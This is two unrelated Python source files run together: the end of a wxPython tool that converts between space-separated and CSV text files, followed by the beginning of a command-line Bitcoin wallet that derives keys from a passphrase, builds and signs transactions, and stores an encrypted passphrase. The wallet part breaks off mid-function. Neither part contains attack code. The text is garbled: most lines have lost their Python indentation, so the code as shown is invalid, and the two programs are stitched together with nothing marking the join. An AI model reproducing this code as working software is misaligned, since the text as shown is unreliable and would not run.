self.header_check_lbl = wx.StaticText(self, label =\
(" "\
+ " Has Header"))
grid.Add(self.header_check_lbl, pos=(7, 0))
self.make_bold(self.header_check_lbl)
#Create Checkbox
self.header_copy = wx.CheckBox(self, style=wx.CHK_2STATE, \
name = "Copy Header")
grid.Add(self.header_copy, pos = (8, 1))
self.Bind(wx.EVT_CHECKBOX, self.OnCheckCopy, self.header_copy)
self.header_copy_lbl = wx.StaticText(self, label =\
(" " +\
" Copy Header"))
grid.Add(self.header_copy_lbl, pos=(8, 0))
self.make_bold(self.header_copy_lbl)
self.header_copy.Enable(False)
#Create Checkbox
self.in_is_csv = wx.CheckBox(self, style=wx.CHK_2STATE, \
name = "Input File CSV")
grid.Add(self.in_is_csv, pos = (9, 1))
self.Bind(wx.EVT_CHECKBOX, self.OnCheckCSV, self.in_is_csv)
self.in_is_csv_lbl = wx.StaticText(self, label =\
(" " +\
" Input is CSV File"))
grid.Add(self.in_is_csv_lbl, pos=(9, 0))
self.make_bold(self.in_is_csv_lbl)
#Create Checkbox
self.out_is_csv = wx.CheckBox(self, style=wx.CHK_2STATE, \
name = "Output File CSV")
grid.Add(self.out_is_csv, pos = (10, 1))
self.Bind(wx.EVT_CHECKBOX, self.OnCheckOut, self.out_is_csv)
self.out_is_csv_lbl = wx.StaticText(self, label =\
(" " +\
" Output is CSV File"))
grid.Add(self.out_is_csv_lbl, pos=(10, 0))
self.make_bold(self.out_is_csv_lbl)
if self.smart_check:
self.out_is_csv.Enable(False)
#Smart Checkbox
create_smartcheck = filemenu.Append(wx.ID_ANY, "Smart&Check", "SmartCheck", wx.ITEM_CHECK)
self.Bind(wx.EVT_MENU, self.OnSmartCheck, create_smartcheck)
#Convert Button
self.convert_button = wx.Button(self, label="Convert")
self.Bind(wx.EVT_BUTTON, self.OnClick, self.convert_button)
self.make_bold(self.convert_button)
#Clear Button
self.clear_button = wx.Button(self, label = "Clear")
self.Bind(wx.EVT_BUTTON, self.Clear, self.clear_button)
self.make_bold(self.clear_button)
#Setup sizers and place them
hSizer.AddSpacer(10)
hSizer.Add(grid, 0, wx.EXPAND, 10)
hSizer.AddSpacer(10)
hSizer.Add(self.logger, 1, wx.EXPAND)
mainSizer.AddSpacer(10)
mainSizer.Add(hSizer, 1,wx.EXPAND)
mainSizer.AddSpacer(10)
mainSizer.Add(self.convert_button, 0, wx.EXPAND | wx.CENTER)
mainSizer.AddSpacer(5)
buttonSizer = wx.BoxSizer(wx.HORIZONTAL)
buttonSizer.Add(self.clear_button, 1, wx.LEFT)
mainSizer.Add(buttonSizer, 0)
self.SetSizerAndFit(mainSizer)
self.Centre()
def OnAbout(self, e):
        '''Displays a popup box that gives information about this software'''
dlg = wx.MessageDialog(self, "Convert Text File Software " + \
"\n\nThis Graphical-" +\
"User-Interface for converting between " +\
"Space separated and comma separated text files"\
+ " was created by" +\
" Cameron Buttazzoni for research " + \
"purposes at the Fires Management " +\
"System Laboratory in the Faculty of Forestry"+\
" at the University of Toronto\n\n" +\
"THIS SOFTWARE IS NOT VALIDATED OR CERTIFIED" +\
" FOR OPERATIONAL USE"\
+ "\nCopyright: Cameron Buttazzoni\n\n", \
"About Convert Text Files Software", wx.OK)
dlg.ShowModal()
dlg.Destroy()
def OnExit(self, e):
'''Exit the software'''
self.Close(True)
raise SystemExit
def OnSave(self, e): #Same functionality as browse output file
'''Select an output file'''
dlg = wx.FileDialog(self, "Choose a file", self.dirname, \
"", "*.*", wx.OPEN)
if dlg.ShowModal() == wx.ID_OK:
self.filename = dlg.GetFilename()
self.dirname = dlg.GetDirectory()
self.input[1] = os.path.join(self.dirname, self.filename)
self.output_box.SetValue(os.path.join(self.dirname, self.filename))
dlg.Destroy()
def OnOpen(self, e): #same functionality as browse input file
'''Open an input file'''
dlg = wx.FileDialog(self, "Choose a file", self.dirname, \
"", "*.*", wx.OPEN)
if dlg.ShowModal() == wx.ID_OK:
self.filename = dlg.GetFilename()
self.dirname = dlg.GetDirectory()
self.input[0] = os.path.join(self.dirname, self.filename)
self.input_box.SetValue(os.path.join(self.dirname, self.filename))
dlg.Destroy()
def OnHelp(self, e):
        '''Opens a box displaying help on using the program'''
        help_text = '''Input file should be a space separated or CSV file\n
For input format, leave it blank to copy all of the values from the input file\n
Instead, you can enter comma or space separated numbers to choose the specific
input columns that you want to include.\nFor output format, the format is
the same, but this chooses the order the inputs will be placed in the output
file.\n Leave this field blank to copy all inputs.\n Numbers not entered will
be replaced by NULL for space separated output files, and an empty string
for CSV output files.\n WARNING: Reordering the output DOES NOT reorder the
header if you select to copy it.\nSmartCheck automatically converts to a
space separated file if the input is CSV, and vice versa.\n
Number of lines copies up to that many lines (not counting the header if copied)
\nTo use filter, enter the values as column number (starting from 1)::string\n
* can be included to keep only lines whose column contains the given string.
-- can be included at the start of a string to copy all lines except matches.\n
Separate additional filters with a comma without a space: ex:\n
4::196*,3::--Type1'''
help_dlg = wx.MessageDialog(self, help_text, "File Conversion" +\
" Software Help", wx.OK)
help_dlg.ShowModal()
help_dlg.Destroy()
def EvtText(self, e, num):
'''Entering text sets input to new entered value'''
try:
value = e.GetString().encode('ascii', 'ignore')
        except AttributeError:
            # Without a usable string there is nothing to record.
            return
if num == 2: #input format
if value == '':
self.input[num] = ''
elif len(value.split(',')) != 1:
temp_list = value.split(',')
for x in range(len(temp_list)):
try:
if temp_list[x] != '' and temp_list[x] != ' ':
temp_list[x] = int(temp_list[x])
except ValueError:
self.logger.AppendText("\nInvalid Format\n")
self.input[num] = temp_list
else:
temp_list = value.split()
for x in range(len(temp_list)):
try:
if temp_list[x] != '' and temp_list[x] != ' ':
temp_list[x] = int(temp_list[x])
except ValueError:
self.logger.AppendText("\nInvalid Format\n")
self.input[num] = temp_list
elif num == 3: #output format
if value == '':
self.input[num] = ''
elif len(value.split(',')) != 1:
temp_list = value.split(',')
for x in range(len(temp_list)):
try:
if temp_list[x] != '' and temp_list[x] != ' ':
temp_list[x] = int(temp_list[x])
except ValueError:
self.logger.AppendText("\nInvalid Format\n")
self.input[num] = temp_list
else:
temp_list = value.split()
for x in range(len(temp_list)):
try:
if temp_list[x] != '' and temp_list[x] != ' ':
temp_list[x] = int(temp_list[x])
except ValueError:
self.logger.AppendText("\nInvalid Format\n")
self.input[num] = temp_list
elif num == 5:
temp_list = value.split(',')
for x in range(len(temp_list)):
try:
temp_list[x] = temp_list[x].split('::')
temp_list[x][0] = int(temp_list[x][0])
if type(temp_list[x][1]) != str:
raise ValueError
except (ValueError, IndexError, TypeError):
pass
self.input[5] = temp_list
else:
self.input[num] = value
def Clear(self, e): #clears logger and all entered values
self.logger.Clear()
self.input_box.Clear()
self.output_box.Clear()
self.out_format.Clear()
self.in_format.Clear()
for x in range(len(self.input)):
self.input[x] = ''
def OnClick(self, e):
'''Convert'''
self.disable_buttons()
if self.input[2] == '':
copy_all_thread = threading.Thread(target = self.copy_all)
copy_all_thread.setDaemon(True)
copy_all_thread.start()
else:
copy_select_thread = threading.Thread(target = self.copy_select)
copy_select_thread.setDaemon(True)
copy_select_thread.start()
def copy_all(self):
#Copy Everything Over
try:
in_file = open(self.input[0], 'r')
except IOError:
self.logger.AppendText("\nInvalid Input File\n\n")
self.enable_buttons()
return
try:
out_file = open(self.input[1], 'w')
except IOError:
self.logger.AppendText("\nInvalid Output File\n\n")
self.enable_buttons()
return
temp = ''
if self.is_header:
temp = in_file.readline()
temp = in_file.readline()
if self.is_csv:
find_length_in = len(temp.split(','))
else:
find_length_in = len(temp.split())
try:
if max(self.input[2]) > find_length_in:
in_file.close()
out_file.close()
self.logger.AppendText("\nInput Format Value Too Large\n\n")
self.enable_buttons()
return
except ValueError:
pass
in_file.seek(0)
self.logger.AppendText("\nConverting...\n\n")
if self.is_header:
temp = in_file.readline()
if temp[-1] == '\n':
temp = temp[:-1]
if self.copy_header:
if self.is_csv:
temp2 = temp.split(',')
for x in range(len(temp2)):
if not self.want_csv:
if temp2[x] != '':
if x != len(temp2) - 1:
out_file.write(temp2[x] + " ")
else:
out_file.write(temp2[x])
else:
if x != len(temp2) - 1:
out_file.write("NULL ")
else:
out_file.write("NULL")
else:
if x != len(temp2) - 1:
out_file.write(temp2[x] + ",")
else:
out_file.write(temp2[x])
out_file.write('\n')
else:
temp2 = temp.split()
for x in range(len(temp2)):
if self.want_csv:
if x != len(temp2) - 1:
out_file.write(temp2[x] + ",")
else:
out_file.write(temp2[x])
else:
if temp2[x] != '':
if x != len(temp2) - 1:
out_file.write(temp2[x] + " ")
else:
out_file.write(temp2[x])
else:
if x != len(temp2) - 1:
out_file.write("NULL ")
else:
out_file.write("NULL")
out_file.write('\n')
temp = in_file.readline()
if self.input[3] == '':
count = 1
while temp != '':
if temp[-1] == '\n':
temp = temp[:-1]
if self.is_csv:
temp2 = temp.split(',')
check = self.filter_line(temp2)
if check == -1:
self.logger.AppendText("Invalid Filter Inputted")
self.enable_buttons()
return
elif check == 0:
temp = in_file.readline()
continue
for x in range(len(temp2)):
if not self.want_csv:
if temp2[x] != '':
if x != len(temp2) - 1:
out_file.write(temp2[x] + " ")
else:
out_file.write(temp2[x])
else:
if x != len(temp2) - 1:
out_file.write("NULL ")
else:
out_file.write("NULL")
else:
if x != len(temp2) - 1:
out_file.write(temp2[x] + ',')
else:
out_file.write(temp2[x])
out_file.write('\n')
else:
temp2 = temp.split()
check = self.filter_line(temp2)
if check == -1:
self.logger.AppendText("Invalid Filter Inputted")
self.enable_buttons()
return
elif check == 0:
temp = in_file.readline()
continue
for x in range(len(temp2)):
if self.want_csv:
if x != len(temp2) - 1:
out_file.write(temp2[x] + ",")
else:
out_file.write(temp2[x])
else:
if temp2[x] != '':
if x != len(temp2) - 1:
out_file.write(temp2[x] + ",")
else:
out_file.write(temp2[x])
else:
if x != len(temp2) - 1:
out_file.write("NULL ")
else:
out_file.write("NULL")
out_file.write('\n')
temp = in_file.readline()
try:
if self.input[4] != '' and count >= int(self.input[4]):
break
count += 1
except ValueError:
self.logger.AppendText("\nInvalid number of runs\n\n")
return
in_file.close()
out_file.close()
self.enable_buttons()
self.logger.AppendText("\nFinished Conversion\n\n")
return
        count = 1
        while temp != '':
for x in range(len(self.input[3])):
if type(self.input[3][x]) != int:
self.logger.AppendText("\nInvalid Output Format\n\n")
self.enable_buttons()
return
if temp[-1] == '\n':
temp = temp[:-1]
if self.is_csv:
temp2 = temp.split(',')
check = self.filter_line(temp2)
if check == -1:
self.logger.AppendText("Invalid Filter Inputted")
self.enable_buttons()
return
elif check == 0:
temp = in_file.readline()
continue
new_line = ["NULL"] * max(self.input[3])
for x in range(len(temp2)):
try:
new_line[self.input[3][x] - 1] = temp2[x] #first spot is 1
except IndexError:
pass
for x in range(len(new_line)):
if not self.want_csv:
if new_line[x] != '':
if x != len(new_line) - 1:
out_file.write(new_line[x] + " ")
else:
out_file.write(new_line[x])
else:
if x != len(new_line) - 1:
out_file.write("NULL ")
else:
out_file.write("NULL")
else:
if x != len(new_line) - 1:
out_file.write(new_line[x] + ",")
else:
out_file.write(new_line[x])
out_file.write('\n')
else:
temp2 = temp.split()
check = self.filter_line(temp2)
if check == -1:
self.logger.AppendText("Invalid Filter Inputted")
self.enable_buttons()
return
elif check == 0:
temp = in_file.readline()
continue
new_line = [""] * max(self.input[3])
for x in range(len(temp2)):
try:
new_line[self.input[3][x] - 1] = temp2[x] #first spot is 1
except IndexError:
pass
for x in range(len(new_line)):
if self.want_csv:
if x != len(new_line) - 1:
out_file.write(new_line[x] + ",")
else:
out_file.write(new_line[x])
else:
if new_line[x] != '':
if x != len(new_line) - 1:
out_file.write(new_line[x] + " ")
else:
out_file.write(new_line[x])
else:
if x != len(new_line) - 1:
out_file.write("NULL ")
else:
out_file.write("NULL")
out_file.write('\n')
temp = in_file.readline()
try:
if self.input[4] != '' and count >= int(self.input[4]):
break
count += 1
except ValueError:
self.logger.AppendText("\nInvalid number of runs\n\n")
return
in_file.close()
out_file.close()
self.enable_buttons()
self.logger.AppendText("\nFinished Conversion\n\n")
return
def copy_select(self):
for x in range(len(self.input[2])):
if type(self.input[2][x]) != int:
self.logger.AppendText("\nInvalid Input Format\n\n")
self.enable_buttons()
return
try:
in_file = open(self.input[0], 'r')
except IOError:
self.logger.AppendText("\nInvalid Input File\n\n")
self.enable_buttons()
return
try:
out_file = open(self.input[1], 'w')
except IOError:
self.logger.AppendText("\nInvalid Output File\n\n")
self.enable_buttons()
return
temp = ''
if self.is_header:
temp = in_file.readline()
temp = in_file.readline()
if self.is_csv:
find_length_in = len(temp.split(','))
else:
find_length_in = len(temp.split())
try:
if max(self.input[2]) > find_length_in:
in_file.close()
out_file.close()
self.logger.AppendText("\nInput Format Value Too Large\n\n")
self.enable_buttons()
return
except ValueError:
pass
in_file.seek(0)
self.logger.AppendText("\nConverting...\n\n")
if self.is_header:
temp = in_file.readline()
if temp[-1] == '\n':
temp = temp[:-1]
if self.copy_header:
if self.is_csv:
temp2 = temp.split(',')
for x in range(len(temp2)):
if not self.want_csv:
if temp2[x] != '':
if x != len(temp2) - 1:
out_file.write(temp2[x] + " ")
else:
out_file.write(temp2[x])
else:
if x != len(temp2) - 1:
out_file.write("NULL ")
else:
out_file.write("NULL")
else:
if x != len(temp2) - 1:
out_file.write(temp2[x] + ",")
else:
out_file.write(temp2[x])
out_file.write('\n')
else:
temp2 = temp.split()
for x in range(len(temp2)):
if self.want_csv:
if x != len(temp2) - 1:
out_file.write(temp2[x] + ",")
else:
out_file.write(temp2[x])
else:
if temp2[x] != '':
if x != len(temp2) - 1:
out_file.write(temp2[x] + " ")
else:
out_file.write(temp2[x])
else:
if x != len(temp2) - 1:
out_file.write("NULL ")
else:
out_file.write("NULL")
out_file.write('\n')
temp = in_file.readline()
#Copy selected ones over
if self.input[3] == '':
            count = 1
            while temp != '':
if temp[-1] == '\n':
temp = temp[:-1]
if self.is_csv:
temp2 = temp.split(',')
check = self.filter_line(temp2)
if check == -1:
self.logger.AppendText("Invalid Filter Inputted")
self.enable_buttons()
return
elif check == 0:
temp = in_file.readline()
continue
for x in range(len(self.input[2])):
if not self.want_csv:
if temp2[self.input[2][x] - 1] != '':
if x != len(self.input[2]) - 1:
out_file.write(temp2[self.input[2][x] - 1] + " ")
else:
out_file.write(temp2[self.input[2][x] - 1])
else:
if x != len(self.input[2]) - 1:
out_file.write("NULL ")
else:
out_file.write("NULL")
else:
if x != len(self.input[2]) - 1:
out_file.write(temp2[self.input[2][x] - 1] + ",")
else:
out_file.write(temp2[self.input[2][x] - 1])
out_file.write('\n')
else:
temp2 = temp.split()
check = self.filter_line(temp2)
if check == -1:
self.logger.AppendText("Invalid Filter Inputted")
self.enable_buttons()
return
elif check == 0:
temp = in_file.readline()
continue
for x in range(len(self.input[2])):
if self.want_csv:
if x != len(self.input[2]) - 1:
out_file.write(temp2[self.input[2][x] - 1] + ",")
else:
out_file.write(temp2[self.input[2][x] - 1])
else:
if temp2[self.input[2][x] - 1] != '':
if x != len(self.input[2]) - 1:
out_file.write(temp2[self.input[2][x] - 1] + " ")
else:
out_file.write(temp2[self.input[2][x] - 1])
else:
if x != len(self.input[2]) - 1:
out_file.write("NULL ")
else:
out_file.write("NULL")
out_file.write('\n')
temp = in_file.readline()
try:
if self.input[4] != '' and count >= int(self.input[4]):
break
count += 1
except ValueError:
self.logger.AppendText("\nInvalid number of runs\n\n")
return
in_file.close()
out_file.close()
self.enable_buttons()
self.logger.AppendText("\nFinished Conversion\n\n")
return
        count = 1
        while temp != '':
for x in range(len(self.input[3])):
if type(self.input[3][x]) != int:
self.logger.AppendText("\nInvalid Output Format\n\n")
self.enable_buttons()
return
if temp[-1] == '\n':
temp = temp[:-1]
if self.is_csv:
temp2 = temp.split(',')
check = self.filter_line(temp2)
if check == -1:
self.logger.AppendText("Invalid Filter Inputted")
self.enable_buttons()
return
elif check == 0:
temp = in_file.readline()
continue
new_line = ["NULL"] * max(self.input[3])
for x in range(len(temp2)):
try:
new_line[self.input[3][x] - 1] = \
temp2[self.input[2][x] - 1]
#first spot is 1
except IndexError:
try:
new_line.append(temp2[self.input[2][x] - 1])
except IndexError:
pass
for x in range(len(new_line)):
if not self.want_csv:
if new_line[x] != '':
if x != len(new_line) - 1:
out_file.write(new_line[x] + " ")
else:
out_file.write(new_line[x])
else:
if x != len(new_line) - 1:
out_file.write("NULL ")
else:
out_file.write("NULL")
else:
if x != len(new_line) - 1:
out_file.write(new_line[x] + ",")
else:
out_file.write(new_line[x])
out_file.write('\n')
else:
temp2 = temp.split()
check = self.filter_line(temp2)
if check == -1:
self.logger.AppendText("Invalid Filter Inputted")
self.enable_buttons()
return
elif check == 0:
temp = in_file.readline()
continue
new_line = [""] * max(self.input[3])
for x in range(len(temp2)):
try:
new_line[self.input[3][x] - 1] = \
temp2[self.input[2][x] - 1]
#first spot is 1
except IndexError:
try:
new_line.append(temp2[self.input[2][x] - 1])
except IndexError:
pass
for x in range(len(new_line)):
if self.want_csv:
if x != len(new_line) - 1:
out_file.write(new_line[x] + ",")
else:
out_file.write(new_line[x])
else:
if new_line[x] != '':
if x != len(new_line) - 1:
out_file.write(new_line[x] + " ")
else:
out_file.write(new_line[x])
else:
if x != len(new_line) - 1:
out_file.write("NULL ")
else:
out_file.write("NULL")
out_file.write('\n')
temp = in_file.readline()
try:
if self.input[4] != '' and count >= int(self.input[4]):
break
count += 1
except ValueError:
self.logger.AppendText("\nInvalid number of runs\n\n")
return
in_file.close()
out_file.close()
self.enable_buttons()
self.logger.AppendText("\nFinished Conversion\n\n")
return
def filter_line(self, line):
if self.input[5] == '':
return 1
for x in range(len(self.input[5])):
temp = copy.deepcopy(self.input[5])
try:
if '*' in temp[x][1] and '--' in temp[x][1]:
temp[x][1] = temp[x][1].translate(None, "*")
temp[x][1] = temp[x][1].translate(None, "--")
if temp[x][1] in line[self.input[5][x][0]-1]:
return 0
elif '*' in temp[x][1]:
temp[x][1] = temp[x][1].translate(None, "*")
if temp[x][1] not in line[self.input[5][x][0]-1]:
return 0
elif '%' in temp[x][1] and '--' in temp[x][1]:
temp[x][1] = temp[x][1].translate(None, "--")
if len(temp[x][1]) == len(line[self.input[5][x][0]-1]):
flag = True
for y in range(len(temp[x][1])):
if temp[x][1][y] != line[self.input[5][x][0]-1][y]\
and temp[x][1][y] != '%':
flag = False
break
if flag:
return 0
elif '%' in temp[x][1]:
if len(temp[x][1]) != len(line[self.input[5][x][0]-1]):
return 0
for y in range(len(temp[x][1])):
if temp[x][1][y] != line[self.input[5][x][0]-1][y]\
and temp[x][1][y] != '%':
return 0
elif '--' == temp[x][1][:2]:
temp[x][1] = temp[x][1].translate(None, "--")
if line[self.input[5][x][0] - 1] == temp[x][1]:
return 0
else:
if line[self.input[5][x][0] - 1] != temp[x][1]:
return 0
except IndexError:
return -1
return 1
def make_bold(self, text):
'''Makes prompts and button text bold'''
temp_font = text.GetFont()
temp_font.SetWeight(wx.BOLD)
text.SetFont(temp_font)
def disable_buttons(self):
'''Prevent User from clicking any buttons'''
self.convert_button.Enable(False)
self.clear_button.Enable(False)
self.browse_button_out.Enable(False)
self.browse_button_input.Enable(False)
def enable_buttons(self):
'''Reenable buttons to be pressed'''
self.convert_button.Enable(True)
self.clear_button.Enable(True)
self.browse_button_out.Enable(True)
self.browse_button_input.Enable(True)
def OnCheckHead(self, e):
if self.is_header == False:
self.is_header = True
else:
self.is_header = False
if self.header_copy.IsEnabled():
self.header_copy.Enable(False)
else:
self.header_copy.Enable(True)
def OnCheckCopy(self, e):
if self.copy_header:
self.copy_header = False
else:
self.copy_header = True
def OnCheckCSV(self, e):
if self.is_csv:
self.is_csv = False
if self.smart_check:
self.want_csv = True
else:
self.is_csv = True
if self.smart_check:
self.want_csv = False
def OnCheckOut(self, e):
if self.want_csv:
self.want_csv = False
else:
self.want_csv = True
def OnSmartCheck(self, e):
if self.smart_check:
self.smart_check = False
self.out_is_csv.Enable(True)
else:
self.smart_check = True
self.out_is_csv.Enable(False)
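# Editor's note (illustrative, not part of the original program): filter
# strings documented in OnHelp take the form "<column>::<text>", separated by
# commas. For example, "4::196*,3::--Type1" keeps only lines whose 4th column
# contains "196" (the trailing '*' makes it a substring match) and whose 3rd
# column is not exactly "Type1" (the leading '--' negates the match). EvtText
# parses that string into [[4, '196*'], [3, '--Type1']] before filter_line
# applies it to each row.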
#run the GUI
app = wx.App(False)
frame = mainwindow(None, "Fire Interpolation System")
frame.Show()
app.MainLoop()
|
|
from bitcoin import *
import getpass
import json
import random
import argparse
import time
import os.path
import binascii
import readline
import platform
import sys
from . import diceware
from .blockchain_providers import *
from .aes import AES
SATOSHIS = 100000000
BTCUSD_RATE = 0
BTCUSD_FETCHED = 0
PROVIDER = None
NO_FIAT = False
RECOMMENDED_FEE = 100 # in satoshis per byte
class Address:
def __init__(self, exp):
self.exp = exp
self.pub = privtopub(exp)
self.addr = pubtoaddr(self.pub)
self.priv = encode_privkey(exp, 'wif')
self.balance = None
self.n = -1
class TxData:
def __init__(self, tx, chg_idx):
self.outs = []
self.change = None
c_outs = deserialize(tx)['outs']
for i,o in enumerate(c_outs):
value = o['value']
address = script_to_address(o['script'])
output = (address, value)
if i != chg_idx:
self.outs.append(output)
else:
self.change = output
class Wallet:
def __init__(self, passphrase):
self.addresses = []
self.idx_map = {}
self.n = 0
self.passphrase = passphrase
def add(self, address):
self.addresses.append(address)
if address is not None: self.idx_map[address.addr] = self.n
address.n = self.n
self.n += 1
def add_many(self, addresses):
for a in addresses:
self.add(a)
def get(self, address_or_index):
idx = -1
if isinstance(address_or_index, int):
idx = address_or_index if 0 <= address_or_index < len(self.addresses) else -1
elif self.idx_map.has_key(address_or_index):
idx = self.idx_map[address_or_index]
if idx == -1:
raise AddrOutOfRangeEx()
return self.addresses[idx]
def get_unused_addr(self):
return next((c for c in self.addresses if c.balance is None), None)
def expand(self, i):
addresses = create_address_range(self.passphrase, self.n, self.n+i)
self.add_many(addresses)
return addresses
def update_balances(self, from_idx = 0):
global PROVIDER
batches=[]
batch_size = 15
batch = []
ind = 0
for i, a in enumerate(self.addresses):
if a is None or i < from_idx: continue
batch_ind = i / batch_size
if ind < batch_size:
batch.append(a.addr)
ind += 1
if ind == batch_size - 1 or i == self.n - 1:
batches.append(batch)
batch = []
ind = 0
for batch in batches:
addr_info = PROVIDER.get_address_info(batch)
for i,info in enumerate(addr_info):
if info[1] > 0:
addr = self.get(batch[i])
addr.balance = info[0]
def auto_init(self, auto_print = True):
gap_limit = 5
print_wallet_header()
while True:
update_from = len(self.addresses)
new_addrs = self.expand(10)
self.update_balances(update_from)
trailing_addrs = self.addresses[-gap_limit:]
n_unused = len([a for a in trailing_addrs if a.balance is None])
print_wallet_addresses(new_addrs, False)
if n_unused >= gap_limit:
break
print_wallet_footer(self)
class AddrOutOfRangeEx(Exception):
pass
def hex_string_to_int_array(hex_string):
result = []
for i in range(0, len(hex_string), 2):
result.append(int(hex_string[i:i+2], 16))
return result
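# For example, hex_string_to_int_array('ff00') returns [255, 0].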
def create_address_range(passphrase, start, end):
list = []
for i in range(start, end):
exp = sha256(passphrase + str(i))
list.append(Address(exp))
return list
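# Editor's sketch (not part of the original wallet): address derivation is
# deterministic, index i maps to the private exponent sha256(passphrase + str(i)),
# so the same passphrase always regenerates the same keys. The helper below is
# illustrative only and never called; the passphrase is a placeholder and far
# too weak for real funds.
def _derivation_example():
    first_three = create_address_range('example passphrase only', 0, 3)
    return [a.addr for a in first_three]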
def make_tx(address, to_address, change_address, amount, fee = None):
global PROVIDER
outs = []
ins = PROVIDER.get_utxo(address.addr)
balance = sum(i['value'] for i in ins)
if fee is None:
txsize = len(ins)*180 + 2*34 + 10 + len(ins)
fee = RECOMMENDED_FEE * txsize
change_amt = 0
if amount + fee >= balance:
amount = balance - fee
else:
change_amt = balance - amount - fee
if change_amt < 10000:
change_amt = 0
amount += change_amt
payment_out = {'value': amount, 'address': to_address}
change_out = {'value': change_amt, 'address': change_address}
# randomize the order of change and payment to increase privacy
outs.append(payment_out)
chg_idx = random.randint(0,1)
if change_amt > 0:
outs.insert(chg_idx, change_out)
else:
chg_idx = -1
tx = mktx(ins, outs)
for i in range(0, len(ins)):
tx = sign(tx, i, address.exp)
return (tx, chg_idx)
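# Editor's note on the size estimate above: with a single input the estimated
# size is 1*180 + 2*34 + 10 + 1 = 259 bytes, so at the default RECOMMENDED_FEE
# of 100 satoshis per byte the automatic fee would be 25,900 satoshis
# (0.000259 BTC) when no explicit fee is passed in.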
def validate_tx(wallet, tx, chg_idx, from_addr, chg_address_str):
print('')
tx_data = TxData(tx, chg_idx)
outs = tx_data.outs
chg = tx_data.change
chg_value = 0 if chg is None else chg[1]
spending = sum(o[1] for o in outs)
fee = from_addr.balance - (spending + chg_value)
# print origin address info
from_idx = wallet.idx_map.get(from_addr.addr)
from_idx_str = '' if from_idx is None else '[{}]'.format(from_idx)
print('From: {} {}'.format(from_addr.addr, from_idx_str))
# print output info
for o in outs:
to_idx = wallet.idx_map.get(o[0])
to_idx_str = '' if to_idx is None else '[{}]'.format(to_idx)
to_str = 'To: ' + colorize('yellow', '{}') + ' -> {} {}'
print(to_str.format(fmt_satoshi(o[1]), o[0], to_idx_str))
# print change info
chg_info = 'none'
if chg is not None:
chg_idx = wallet.idx_map.get(chg[0])
chg_idx_str = '' if chg_idx is None else '[{}]'.format(chg_idx)
chg_info = colorize('yellow', '{}') + ' -> {} {}'
chg_info = chg_info.format(fmt_satoshi(chg[1]), chg[0], chg_idx_str)
print('Change: ' + chg_info)
# print fee
btc_fee = fmt_satoshi(fee)
usd_fee = to_usd(btc_fee)
print('Fee: ' + colorize('yellow', '{} (${:.2f})').format(btc_fee, usd_fee))
# assert that all values add up and that nothing is lost
assert fee + spending + chg_value == from_addr.balance
if chg_value > 0:
assert chg[0] == chg_address_str
def send(wallet, addr_idx, to_address, amount, fee = None,
chg_address_str = None, craft_only = False):
from_addr = wallet.get(addr_idx)
if from_addr.balance is None or from_addr.balance < amount:
print('Insufficient balance on the specified address.')
return
from_addr = wallet.addresses[addr_idx]
chg_address = wallet.get_unused_addr()
if chg_address_str is None:
chg_address_str = from_addr.addr if chg_address is None else chg_address.addr
#address format validation
try:
b58check_to_bin(to_address)
b58check_to_bin(chg_address_str)
except:
print('Invalid destination or change address.')
return
tx, chg_idx = make_tx(from_addr, to_address, chg_address_str, amount, fee)
validate_tx(wallet, tx, chg_idx, from_addr, chg_address_str)
if craft_only:
print(tx)
elif prompt_bool('Proceed?'):
global PROVIDER
push_res = PROVIDER.pushtx(tx)
if (push_res[0]):
print('Transaction pushed.\ntxhash: %s' % txhash(tx))
else:
print('Push error: ' + push_res[1])
else:
print('Transaction aborted.')
def sweep(wallet, priv, to_addr_idx = None):
global PROVIDER
try:
exp = b58check_to_hex(priv)
except:
print('Not a valid private key.')
return
from_address = Address(exp)
from_address.balance = PROVIDER.get_address_info([from_address.addr])[0][0]
if to_addr_idx is not None:
to_address = wallet.get(to_addr_idx).addr
else:
unused_address = wallet.get_unused_addr()
if unused_address is None:
print('No free addresses')
return
else:
to_address = unused_address.addr
tx, chg_idx = make_tx(from_address, to_address, None, from_address.balance)
validate_tx(wallet, tx, None, from_address, None)
if prompt_bool('Proceed?'):
push_res = PROVIDER.pushtx(tx)
if (push_res[0]):
print('Transaction pushed.\ntxhash: %s' % txhash(tx))
else:
print('Push error: ' + push_res[1])
else:
print('Sweeping aborted.')
def print_wallet_header():
print('\n#\taddress\t\t\t\t\tUSD\t\tBTC')
def print_wallet_addresses(addresses, show_spent):
for a in addresses:
if a is None:
pass
else:
balance_str = 'N/A'
fiat_str = 'N/A'
if a.balance == 0 and not show_spent:
continue
if a.balance is not None:
balance_str = fmt_satoshi(a.balance)
fiat_str = '{0:.2f}'.format(to_usd(balance_str))
print('{}\t{}\t{}\t{}'.format(a.n, a.addr, fiat_str.ljust(10), balance_str))
def print_wallet_footer(wallet):
total = 0
for a in wallet.addresses:
if a.balance is not None:
total += a.balance
print(72 * '-')
usd_total = '{:.2f}'.format(to_usd(fmt_satoshi(total))).ljust(10)
print('TOTAL: \t\t\t\t\t\t{}\t{}'.format(usd_total, fmt_satoshi(total)))
def print_wallet(wallet, show_spent = False):
print_wallet_header()
print_wallet_addresses(wallet.addresses, show_spent)
print_wallet_footer(wallet)
def sign_text(address):
print('Enter the message to sign. End with a newline.\n')
text = raw_input()
sig = ecdsa_sign(text, address.priv)
print(sig)
def dump_addr(wallet, path):
f = open(path, 'w')
for a in wallet.addresses:
f.write(a.addr + '\n')
f.close()
    print('Addresses saved to a file successfully')
def display_help(cmds):
print('Type [command] -h to display help for a command.')
print('Available commands:')
for key in cmds:
print(key)
def refresh_wallet(wallet):
wallet.update_balances()
def fmt_satoshi(value):
return (float(value) / SATOSHIS)
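# For example, fmt_satoshi(150000000) returns 1.5 (BTC).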
def save_ph_to_file(filename, ph):
key = getpass.getpass('Encryption key:')
aes = AES(key)
iv_hex = ''.join('{:02x}'.format(i) for i in aes.get_iv_str())
ph_hex = ''.join('{:02x}'.format(i) for i in aes.encrypt(ph))
f = open(filename, 'w')
f.write(iv_hex + ph_hex)
f.close()
    print('File saved successfully.')
def get_ph_from_file(filename):
f = open(filename, 'r')
in_data = f.readline().strip()
f.close()
key = getpass.getpass('Decryption key:')
iv_bytes = hex_string_to_int_array(in_data[0:64])
ph_bytes = hex_string_to_int_array(in_data[64:])
aes = AES(key, iv_bytes)
ph = ''.join(chr(i) for i in aes.decrypt(ph_bytes) if i > 31)
return ph
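# Editor's note: the key file written by save_ph_to_file is a single hex line,
# the IV followed by the AES-encrypted passphrase; get_ph_from_file reads the
# first 64 hex characters back as the IV and treats the remainder as
# ciphertext.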
def prompt_bool(question):
res = False
while True:
val = raw_input(question + ' (y/n)').lower()
if val == 'y' or val == 'n':
res = val == 'y'
